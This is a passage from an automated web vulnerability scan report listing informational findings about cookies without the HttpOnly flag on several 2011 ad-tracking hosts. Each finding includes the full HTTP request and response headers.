Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:13 GMT
Set-Cookie: bklc=4dbe10a5; expires=Wed, 04-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:02:13 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=BN6qAw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpM8tjQWJjZjaQ3L1IUARsOQHd/4dSB9RUFjRpvMtaOXew8sHCIwsjA1mU48XLW8SL2xrDgGdsNSCkxIW0P3c0rYkEIi0HDFgxTvCdAcCi4A8KORqGJ/XwZkEF9fQwhfbZQXC6fsPeT/w6ywCrxFtTr/XB3JcTBs7IvYRnw0zU9zs9b9yGdoHZPf2i90Q4H0mq5PAWNcIxIjef/4E9I9aW+E6D=; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMpNn96WxC3z/YYRhQ3Dxnsyw27BtathiwvwYWKJouLD22C9YuHcrE30a21sdAWRDs6WnLqYy+FWlVBMRtq3UvriDppypX6Ta7ozOki9qeGSMR7CKKTG3XmgHJiEz1R7YODoqsTMD0z9uiGahNZZ7iDeYo82ll724UYWqnh82KfxsUOaWyfCxAAGrAD+p1gdx3/vFtV3oH+VabSl82aUNlXJgMpq92cGU0PaUj7+Ld6h+e6EKiPkL1Wrf7UsX6d8ow7Cl8+NNSn4Ym/pbwHJZhVaTG1qjv5oVwA8tHTB8ic3+p1QDWNyMGRRhoxD03354+ff5g9wDGmQbVfxrhUcKpIUAlFmwKokW/DGgCuuDojxxRAtSDBHVVJmAZJilh2v2V47pt0XbhaI+; expires=Sat, 29-Oct-2011 02:02:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:13 GMT; path=/; domain=.bluekai.com
BK-Server: c53d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
17.100. http://tags.bluekai.com/site/2893  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2893

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2893?id=3419824627245671268 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:04:03 GMT
Set-Cookie: bklc=4dbe1113; expires=Wed, 04-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 03 May 2011 02:04:03 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=gA7hed16vaVVIHOf; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpp8VjQI17Y0Y9Lr1IUARsOyH4/B2JCxmccLYeTZ4y1eeXK1pvRXrdpjRn0NHbCXoUHIa3NeYCXoAoDwkzavF2aWio4VC0Pel/wM1dJ0X9ylRuHR4wvcVelQ4MlPae8Mo61vc0x4Ci4ezC4B8KHREDuFySBwXDWyK4ARZ9T1J6OCjduM1olqWekQtCAXtbgGJGwzCX0cIxIsOX98U5nHx==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMp2n96WDhnz/YYRhuWGCVBQKfndl5C5LRM0MxQMhBvUic7L/QSx/504VxFgQPf9HhDqxxiyLgslXeORt5gqrUHV6dzl1ZlAPXgh10OJJhbwhJOI4Nj8ba4n36xSJCKm96QPvVhF/hWaQvzw9mmr66Nxia4wwmI2dUpyOMHKwFMN3W3WGGraYvZ9Q99VRTfvCDPN/qJSJUgP1usR6kXQPkTYvz5EBNDvIgwfgrwJG7jMOTeyIfWmb0d5mN5j/j+t/HyqEoBI5H+r572Se2N8ffhgo+11Gf96cBWppQlO4E51E+mNLsr21HrVrK36RDjxnMjxjpoUtR8iK42NbrPD7oWq0FgB8I6/Kjz11jFKK42unJxGHnWiQMYK1DZoBWMwDPkGEJhiq+X4YKfw08dP4OZJMaQ==; expires=Sat, 29-Oct-2011 02:04:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:04:03 GMT; path=/; domain=.bluekai.com
BK-Server: f349
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
17.101. http://tags.bluekai.com/site/3754  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3754

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&ret=html&id=PARTNER_UUID HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bklc=4dbe0f3c; bk=VO+y8416vaVVIHOf; bkc=KJpn8s5QIwsRAzsD48XFWy1ex0SxgdR/kSI1h+K3jDeC1NViXgA3DwAFAke86rvGdOQVOJIEkTaCrQAMyISPmlyjG4hfv3CXh6Tsae8/wTpwOruFZXF/LO3JUTws7tvYTcB01E9zZ1b9yA2oHrDfB3e0xEu0Kq5PD16crxIjel/4M9X9/L2WXx==; bko=KJynWtHQLmc48XF/R9BAZRJjlgyxaCBe/oEapeYJeSvmQ6sVMTaCXXG5FQG1AAeVZHDf4wAj3GYLA6+t9wDSLp1yf9mpfQeNoiysLPuOgsyKW9L9NjzRV9==; bkst=KJhkMf2ny69DhtXGYeShQbBxcaye2dw5cqMWs3+YvecSD4cYOScxeisJm9FrhUdOHHxUxx5hzcOtXV2yzcap25votwUpw+dlF3IaUoRHVAnkKeuKNm1pfpkrGEKcBkesnOU9quYP1xcwgxQ1JCOGSb00Y7w9qwoNfd0wIHViXIgxM6mgiWA1GY7MDCeOOeYCMtzUmrt8hmRLWuIi0dqYlZrcNoamAFwLzYevUqolvg5sFm37BBPx8GBIAVfl4grwpgNhfCg3CPWShz1WHtP2WmlnGMyOWNja+M1jpqgTUkmPuL3j9Ay6oPJhGWHBFIdzrmLM8vabRW65UFYMSkiJ3y4cwdtZixxxH7YOYz6Jh+MGwYmQeezb00cEf6IBKfF0ffzdGIjiVQ==; bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9LWDU/L1aGCirsuaAEicJzewXHjnjjLg9T1jj0UYOcuHZjyAi1dZkhHAR+vt9iCkvsWTyQ1xRyYx7flxEHQj2JOAZaJ7q5QQjjCxj5lLxryx3OicjKsFZ1Mv6mp9yoWkD13u9hPTT/a09vF1uuzq9YK/4AetzespmYwdW91meQqKuTxDp0slgluObZYGjswRi0E9pnWSuIKSOqBG8eTHo9aiV1f6=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:02:46 GMT
Set-Cookie: bklc=4dbe10c6; expires=Wed, 04-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=cZ6ypw16vaVVIHOf; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhqhz49GntsAKsRye84HQRsCkP9dCzVPcT1Yymz7X7wyweM1umev4XIU0RGUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIuelywizF9y1666RsESFl9atcTCdEyVPf2MJQ1/cbR4htReX5U1jsPRMXVFxIaB1WchmnQSs921jDwQopSCXhyjDwGCsBrItY3g8/wzCX6crQdWOi8PmX9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhkMg2ny69RCZXGYnSNQ3Bxcaye2dmfmlYJqSyPRZlE5gHT/DW/+WBJ/LbYKda4zOcaH5OOmMC65FaFzcOhzdUu35eNIjfld5TuK+2WS9mkTtxX0zKUkEKdCeTLtAzCibQ9cMkusKwymOvmyxxzcjk/HxopysptdVE2p2DvDj+q2sFHeZ/u9tMvrOHW19a1bwwkCNo8JUsyEwMgbvSXN7+76HfulK8PtmI/2JitnIHCygBVx91BS5hoERBZTbdIR+NfbIbiCrLa7MdLRidBK2bJ7vRM1sTteRXZ0UJn+PJ1ojJ0oQ9EESkDcYCHL82cKb8UWS3QFOmjlnlZQt0Ri5+70fI3hH/J//pQ9C1SWT0h6Ua/xOkr5OCe3OKFC4ryPUuzrqlI35zqexq+8ZJffFXeiGhMM9==; expires=Sat, 29-Oct-2011 02:02:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 02:02:46 GMT; path=/; domain=.bluekai.com
BK-Server: 3550
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
17.102. http://tags.bluekai.com/site/3945  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="h
...[SNIP]...
17.103. http://translate.googleapis.com/translate_a/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/l?client=te&hl=en&cb=_callbacks_._0gn72h6kz HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:24 GMT
Expires: Mon, 02 May 2011 02:07:24 GMT
Cache-Control: private, max-age=86400
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=77203a7447578845:TM=1304302044:LM=1304302044:S=1q_UlsnR6eLHF2dR; expires=Wed, 01-May-2013 02:07:24 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1717

_callbacks_._0gn72h6kz({'sl':{'auto':'Detect language','af':'Afrikaans','sq':'Albanian','ar':'Arabic','be':'Belarusian','bg':'Bulgarian','ca':'Catalan','zh-CN':'Chinese','hr':'Croatian','cs':'Czech','
...[SNIP]...
17.104. http://um.simpli.fi/ab_match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /ab_match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ab_match HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: um.simpli.fi

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 02 May 2011 02:09:12 GMT
Content-Type: text/html
Connection: close
Set-Cookie: uid=G2tSSfsD3T9Q3E3BUMibCF%3D%3D; domain=.simpli.fi; path=/; expires=Tue, 01-May-2012 02:09:12 GMT
P3P: policyref="http://www.simplifi.com/w3c/Policies.xml", CP="ADMa DEVa PSAa PSDa OUR IND DSP NON COR"
Location: http://ads.adbrite.com/adserver/vdi/762701?d=49526B1B3FDD03FBC14DDC50089BC850
Content-Length: 0

17.105. http://user.lucidmedia.com/clicksense/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=88436487f575811a&r=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: user.lucidmedia.com

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Mon, 02 May 2011 02:35:25 GMT
Expires: Mon, 02 May 2011 02:35:26 GMT
Set-Cookie: 2=2yiXqyLLXLn; Domain=.lucidmedia.com; Expires=Tue, 01-May-2012 02:35:26 GMT; Path=/
Location: http://ads.adbrite.com/adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D
Content-Length: 0
Connection: close

17.106. http://va.px.invitemedia.com/goog_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=Tb4RXwAHNm8K5ovHrlhLb5hGYOYV9br2QoBlYA&creativeID=110455&message=eJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; 